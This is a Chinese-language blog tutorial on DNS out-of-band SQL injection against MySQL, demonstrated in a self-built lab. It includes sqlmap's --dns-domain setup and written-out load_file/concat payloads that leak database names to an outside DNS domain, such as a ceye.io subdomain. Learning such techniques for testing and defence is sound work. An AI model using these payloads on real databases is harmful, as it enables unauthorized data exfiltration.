DNS注入(诸葛亮:略懂,略懂)

本文涉及的产品
云解析 DNS,旗舰版 1个月
全局流量管理 GTM,标准版 1个月
公共DNS(含HTTPDNS解析),每月1000万次HTTP解析
简介: 本文为实战文章,环境全是自己搭建

本文为实战文章,环境全是自己搭建

1. 为什么要使用DNS注入

盲注跑数据太慢的情况下,选择DNS注入是一个好办法。

2. DNS注入的原理

把域名dns指向我们的服务器域名,这样的话解析域名的时候就会向我们的dns服务器查询。通过递归查询就可以获取数据库上的信息了。要记住整个域名内的节点标签被限制在63个字符长度大小。

3. DNS注入的要求

数据库在配置中允许域名解析时

到我们数据库中查看一下:show variables like skip_name_resolve;

 

skip_name_resolve这个参数是禁止域名解析

skip_name_resolve off时会进行域名解析

一旦开启此参数,所有远程主机连接数据库授权都要使用IP地址的方式。

生产环境正常都是开启的。

4. 实战

首先我们服务器上安装sqlmap

发现服务器已经有2.6python环境了

 


直接pip install sqlmap

 

 

安装成功。

接着

 

找到sqlmap根目录

cd /usr/lib/python2.6/site-packages/sqlmap/lib/request/

 

dns.py

它的作用是监听53端口,先给它一个执行权限,+x

这里我直接给他最大权限了

chmod 777 dns.py

mysql命令行执行 select load_file("\\\\xxx.zka7.xyz\\txf");

\\\\经过传输后会变成\\

txf是域名的下级目录,可以随便构造

执行后服务器就会有数据包(xxx.zka7.xyz)出现

 


5. Sqlmap的自动化实现

sqlmap中实现DNS注入加上参数

在服务器安装好了sqlmap然后运行dns.py

--dns-domain=域名

即可实现自动化。

 

6. 我不想买2个域名,我不想买服务器,我也想玩一波DNS注入

有现成的服务:http://ceye.io

 

登陆之后

 

有一个分配给你的二级域名

在数据库中输入

select load_file("\\\\tangxiaofeng.1odz7u.ceye.io\\aaa");

 

可以看到tangxiaofeng这个帅气的名字。

 

试一下拼接。

首先本地选择一个表

use sqltest

这里的sqltest是我自己建的表

接着select load_file(concat("\\\\",(select database()),".1odz7u.ceye.io\\txf"));

 

database出来了。

相关文章
|
3月前
|
域名解析 缓存 网络协议
DNS 解析
DNS 解析
71 5
|
3月前
|
域名解析 缓存 网络协议
如何加快 DNS 解析速度?
如何加快 DNS 解析速度?
214 3
|
7月前
|
XML 运维 网络协议
一个DNS解析引发的“血案”
在复杂网络环境中,面对问题时,我们需要借助数据包分析技术来定位和解决。虽然没有固定的分析流程,但通常会通过排除法,从网络层、设备层和应用层指标入手。
|
域名解析 Kubernetes 网络协议
【K8S系列】深入解析DNS
【K8S系列】深入解析DNS
418 0
|
网络协议 网络安全
DNS解析服务
DNS解析服务
157 1
|
缓存 网络协议
可能是由于DNS解析出现问题引起的
可能是由于DNS解析出现问题引起的
51 1
|
网络协议
dns解析问题
dns解析问题
89 0
|
存储 SQL 网络协议
利用DNSLog实现无回显注入
测试一些网站的时候,一些注入都是无回显的,我们可以写脚本来进行盲注,但有些网站会ban掉我们的ip,这样我们可以通过设置ip代理池解决, 但是盲注往往效率很低,所以产生了DNSlog注入
496 0
|
Kubernetes Docker 容器
代理配置
代理配置
196 0
|
网络协议
实现dns解析功能
在ROUCK下实现dns的解析功能